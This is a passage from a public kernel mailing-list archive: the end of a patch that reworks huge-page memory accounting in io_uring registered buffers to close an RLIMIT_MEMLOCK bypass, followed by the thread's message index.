 	struct iovec fast_iov, *iov;
-	struct page *last_hpage = NULL;
 	struct iovec __user *uvec;
 	u64 user_data = up->data;
 	__u32 done;
@@ -322,7 +397,7 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
 		err = io_buffer_validate(iov);
 		if (err)
 			break;
-		node = io_sqe_buffer_register(ctx, iov, &last_hpage);
+		node = io_sqe_buffer_register(ctx, iov);
 		if (IS_ERR(node)) {
 			err = PTR_ERR(node);
 			break;
@@ -620,76 +695,73 @@ int io_sqe_buffers_unregister(struct io_ring_ctx *ctx)
 }
 
 /*
- * Not super efficient, but this is just a registration time. And we do cache
- * the last compound head, so generally we'll only do a full search if we don't
- * match that one.
- *
- * We check if the given compound head page has already been accounted, to
- * avoid double accounting it. This allows us to account the full size of the
- * page, not just the constituent pages of a huge page.
+ * Undo hpage_acct_ref() calls made during io_buffer_account_pin() on failure.
+ * This operates on the pages array since imu->bvec isn't populated yet.
  */
-static bool headpage_already_acct(struct io_ring_ctx *ctx, struct page **pages,
-				  int nr_pages, struct page *hpage)
+static void io_buffer_unaccount_hpages(struct io_ring_ctx *ctx,
+				       struct page **pages, int nr_pages)
 {
-	int i, j;
+	struct page *seen = NULL;
+	int i;
+
+	if (!ctx->user)
+		return;
 
-	/* check current page array */
 	for (i = 0; i < nr_pages; i++) {
+		struct page *hpage;
+
 		if (!PageCompound(pages[i]))
 			continue;
-		if (compound_head(pages[i]) == hpage)
-			return true;
-	}
-
-	/* check previously registered pages */
-	for (i = 0; i < ctx->buf_table.nr; i++) {
-		struct io_rsrc_node *node = ctx->buf_table.nodes[i];
-		struct io_mapped_ubuf *imu;
 
-		if (!node)
+		hpage = compound_head(pages[i]);
+		if (hpage == seen)
 			continue;
-		imu = node->buf;
-		for (j = 0; j < imu->nr_bvecs; j++) {
-			if (!PageCompound(imu->bvec[j].bv_page))
-				continue;
-			if (compound_head(imu->bvec[j].bv_page) == hpage)
-				return true;
-		}
-	}
+		seen = hpage;
 
-	return false;
+		hpage_acct_unref(ctx, hpage);
+		cond_resched();
+	}
 }
 
 static int io_buffer_account_pin(struct io_ring_ctx *ctx, struct page **pages,
-				 int nr_pages, struct io_mapped_ubuf *imu,
-				 struct page **last_hpage)
+				 int nr_pages)
 {
+	unsigned long acct_pages = 0;
+	struct page *seen = NULL;
 	int i, ret;
 
-	imu->acct_pages = 0;
+	if (!ctx->user)
+		return 0;
+
 	for (i = 0; i < nr_pages; i++) {
+		struct page *hpage;
+
 		if (!PageCompound(pages[i])) {
-			imu->acct_pages++;
-		} else {
-			struct page *hpage;
-
-			hpage = compound_head(pages[i]);
-			if (hpage == *last_hpage)
-				continue;
-			*last_hpage = hpage;
-			if (headpage_already_acct(ctx, pages, i, hpage))
-				continue;
-			imu->acct_pages += page_size(hpage) >> PAGE_SHIFT;
+			acct_pages++;
+			continue;
 		}
+
+		hpage = compound_head(pages[i]);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
+
+		if (hpage_acct_ref(ctx, hpage))
+			acct_pages += page_size(hpage) >> PAGE_SHIFT;
+		cond_resched();
 	}
 
-	if (!imu->acct_pages)
-		return 0;
+	/* Try to account the memory */
+	if (acct_pages) {
+		ret = io_account_mem(ctx->user, ctx->mm_account, acct_pages);
+		if (ret) {
+			/* Undo the refs we just added */
+			io_buffer_unaccount_hpages(ctx, pages, nr_pages);
+			return ret;
+		}
+	}
 
-	ret = io_account_mem(ctx->user, ctx->mm_account, imu->acct_pages);
-	if (ret)
-		imu->acct_pages = 0;
-	return ret;
+	return 0;
 }
 
 static bool io_coalesce_buffer(struct page ***pages, int *nr_pages,
@@ -778,8 +850,7 @@ bool io_check_coalesce_buffer(struct page **page_array, int nr_pages,
 }
 
 static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
-						   struct iovec *iov,
-						   struct page **last_hpage)
+						   struct iovec *iov)
 {
 	struct io_mapped_ubuf *imu = NULL;
 	struct page **pages = NULL;
@@ -817,7 +888,7 @@ static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
 		goto done;
 
 	imu->nr_bvecs = nr_pages;
-	ret = io_buffer_account_pin(ctx, pages, nr_pages, imu, last_hpage);
+	ret = io_buffer_account_pin(ctx, pages, nr_pages);
 	if (ret)
 		goto done;
 
@@ -867,7 +938,6 @@ static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
 int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
 			    unsigned int nr_args, u64 __user *tags)
 {
-	struct page *last_hpage = NULL;
 	struct io_rsrc_data data;
 	struct iovec fast_iov, *iov = &fast_iov;
 	const struct iovec __user *uvec;
@@ -913,7 +983,7 @@ int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
 			}
 		}
 
-		node = io_sqe_buffer_register(ctx, iov, &last_hpage);
+		node = io_sqe_buffer_register(ctx, iov);
 		if (IS_ERR(node)) {
 			ret = PTR_ERR(node);
 			break;
@@ -980,7 +1050,6 @@ int io_buffer_register_bvec(struct io_uring_cmd *cmd, struct request *rq,
 
 	imu->ubuf = 0;
 	imu->len = blk_rq_bytes(rq);
-	imu->acct_pages = 0;
 	imu->folio_shift = PAGE_SHIFT;
 	refcount_set(&imu->refs, 1);
 	imu->release = release;
@@ -1153,6 +1222,33 @@ int io_import_reg_buf(struct io_kiocb *req, struct iov_iter *iter,
 }
 
 /* Lock two rings at once. The rings must be different! */
+static void io_buffer_acct_cloned_hpages(struct io_ring_ctx *ctx,
+					 struct io_mapped_ubuf *imu)
+{
+	struct page *seen = NULL;
+	int i;
+
+	if (imu->is_kbuf || !ctx->user)
+		return;
+
+	for (i = 0; i < imu->nr_bvecs; i++) {
+		struct page *page = imu->bvec[i].bv_page;
+		struct page *hpage;
+
+		if (!PageCompound(page))
+			continue;
+
+		hpage = compound_head(page);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
+
+		/* Add an accounting reference for the cloned buffer */
+		hpage_acct_ref(ctx, hpage);
+		cond_resched();
+	}
+}
+
 static void lock_two_rings(struct io_ring_ctx *ctx1, struct io_ring_ctx *ctx2)
 {
 	if (ctx1 > ctx2)
@@ -1234,6 +1330,8 @@ static int io_clone_buffers(struct io_ring_ctx *ctx, struct io_ring_ctx *src_ctx
 
 			refcount_inc(&src_node->buf->refs);
 			dst_node->buf = src_node->buf;
+			/* track compound references to clones */
+			io_buffer_acct_cloned_hpages(ctx, src_node->buf);
 		}
 		data.nodes[off++] = dst_node;
 		i++;
diff --git a/io_uring/rsrc.h b/io_uring/rsrc.h
index 4a5db2ad1af2..753d0cec5175 100644
--- a/io_uring/rsrc.h
+++ b/io_uring/rsrc.h
@@ -34,7 +34,6 @@ struct io_mapped_ubuf {
 	unsigned int	nr_bvecs;
 	unsigned int    folio_shift;
 	refcount_t	refs;
-	unsigned long	acct_pages;
 	void		(*release)(void *);
 	void		*priv;
 	bool		is_kbuf;
-- 
2.51.0

-- 
Jens Axboe

^ permalink raw reply related	[flat|nested] 22+ messages in thread

end of thread, other threads:[~2026-01-24 18:44 UTC | newest]

Thread overview: 22+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2026-01-19  7:10 [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting Yuhao Jiang
2026-01-19 17:03 ` Jens Axboe
2026-01-19 23:34   ` Yuhao Jiang
2026-01-19 23:40     ` Jens Axboe
2026-01-20  7:05       ` Yuhao Jiang
2026-01-20 12:04         ` Jens Axboe
2026-01-20 12:05         ` Pavel Begunkov
2026-01-20 17:03           ` Jens Axboe
2026-01-20 21:45             ` Pavel Begunkov
2026-01-21 14:58               ` Jens Axboe
2026-01-22 11:43                 ` Pavel Begunkov
2026-01-22 17:47                   ` Jens Axboe
2026-01-22 21:51                     ` Pavel Begunkov
2026-01-23 14:26                       ` Pavel Begunkov
2026-01-23 14:50                         ` Jens Axboe
2026-01-23 15:04                           ` Jens Axboe
2026-01-23 16:52                             ` Jens Axboe
2026-01-24 11:04                               ` Pavel Begunkov
2026-01-24 15:14                                 ` Jens Axboe
2026-01-24 15:55                                   ` Jens Axboe
2026-01-24 16:30                                     ` Pavel Begunkov
2026-01-24 18:44                                     ` Jens Axboe

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox